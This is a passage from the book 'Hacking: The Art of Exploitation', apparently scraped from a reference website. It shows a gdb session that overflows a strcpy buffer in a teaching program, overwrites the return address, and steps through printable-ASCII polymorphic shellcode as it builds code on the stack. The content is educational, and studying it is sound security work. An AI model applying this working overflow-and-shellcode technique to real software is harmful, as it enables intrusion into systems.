COUNTERMEASURES - Hacking: The Art of Exploitation

Graphics Programs Reference

In-Depth Information

0x080484b5 <update_product_description+13>: lea eax,[ebp-24]

0x080484b8 <update_product_description+16>: mov DWORD PTR [esp],eax

0x080484bb <update_product_description+19>: call 0x8048388 <strcpy@plt>

0x080484c0 <update_product_description+24>: mov eax,DWORD PTR [ebp+12]

0x080484c3 <update_product_description+27>: mov DWORD PTR [esp+8],eax

0x080484c7 <update_product_description+31>: lea eax,[ebp-24]

0x080484ca <update_product_description+34>: mov DWORD PTR [esp+4],eax

0x080484ce <update_product_description+38>: mov DWORD PTR [esp],0x80487a0

0x080484d5 <update_product_description+45>: call 0x8048398 <printf@plt>

0x080484da <update_product_description+50>: leave

0x080484db <update_product_description+51>: ret

End of assembler dump.

(gdb) break *0x080484db

Breakpoint 1 at 0x80484db: file update_info.c, line 21.

(gdb) run $(perl -e 'print "AAAA"x10') $(cat ./printable)

Starting program: /home/reader/booksrc/update_info $(perl -e 'print "AAAA"x10') $(cat ./

printable)

[DEBUG]: desc argument is at 0xbffff8fd

Program received signal SIGSEGV, Segmentation fault.

0xb7f06bfb in strlen () from /lib/tls/i686/cmov/libc.so.6

(gdb) run $(perl -e 'print "\xfd\xf8\xff\xbf"x10') $(cat ./printable)

The program being debugged has been started already.

Start it from the beginning? (y or n) y

Starting program: /home/reader/booksrc/update_info $(perl -e 'print "\xfd\xf8\xff\xbf"x10')

$(cat ./printable)

[DEBUG]: desc argument is at 0xbffff8fd

Updating product # with description 'TX-3399-Purr-!TTTP\%JONE%501:-%mm4-%mm%--DW%P-Yf1Y-fwfY-

yzSzP-iii%-Zkx%-%Fw%P-XXn6-99w%-ptt%P-%w%%-qqqq-jPiXP-cccc-Dw0D-WICzP-c66c-W0TmP-TTTT-%NN0-

%o42-7a-0P-xGGx-rrrx-aFOwP-pApA-N-w--B2H2PPPPPPPPPPPPPPPPPPPPPP'

Breakpoint 1, 0x080484db in update_product_description (

id=0x72727550 <Address 0x72727550 out of bounds>,

desc=0x5454212d <Address 0x5454212d out of bounds>) at update_info.c:21

21 }

(gdb) stepi

0xbffff8fd in ?? ()

(gdb) x/9i $eip

0xbffff8fd: push esp

0xbffff8fe: pop eax

0xbffff8ff: sub eax,0x39393333

0xbffff904: sub eax,0x72727550

0xbffff909: sub eax,0x54545421

0xbffff90e: push eax

0xbffff90f: pop esp

0xbffff910: and eax,0x454e4f4a

0xbffff915: and eax,0x3a313035

(gdb) i r esp

esp 0xbffff6d0 0xbffff6d0

(gdb) p /x $esp + 860

$1 = 0xbffffa2c

(gdb) stepi 9

0xbffff91a in ?? ()

(gdb) i r esp eax

Hacking: The Art of Exploitation

Search WWH ::

Custom Search

Home